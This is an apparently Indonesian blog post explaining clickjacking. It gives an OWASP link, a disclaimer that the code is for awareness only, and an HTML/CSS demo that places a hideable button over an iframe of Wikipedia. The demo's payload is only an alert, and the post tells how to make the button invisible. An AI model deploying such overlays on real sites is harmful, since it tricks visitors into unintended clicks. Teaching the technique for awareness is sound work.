Clickjacking Script Example
Clickjacking adalah teknik mengelabui pengunjung website menggunakan iframe website aslinya dengan menempelkan kode HTML atau Javascript pada iframe tersebut. Selengkapnya tentang clickjacking https://owasp.org/www-community/attacks/Clickjacking
Contoh script berikut tidak ditujukan untuk disalahgunakan, melainkan untuk lebih aware terhadap keamanan sebuah website.
Berikut contoh script clickjacking.
<style>
iframe {
height: 100%;
width: 100%;
border: 0;
}
.frame-container {
position: relative;
}
.iframe-button {
display: none;
position: absolute;
top: 80px;
left: 300px;
height: 10%;
width: 20%;
opacity: 2;
}
.frame-container:hover .iframe-button {
display: initial;
}
</style>
<div class="frame-container">
<button class="iframe-button" onclick="alert('clickjaciking');">
Click me
</button>
<iframe src="https://id.wikipedia.org"></iframe>
</div>
Untuk menyembunyikan tombol button "click me", silahkan hidden button tersebut dengan merubah nilai "opacity" pada class iframe-button dari 2 menjadi 0
Posting Komentar untuk "Clickjacking Script Example"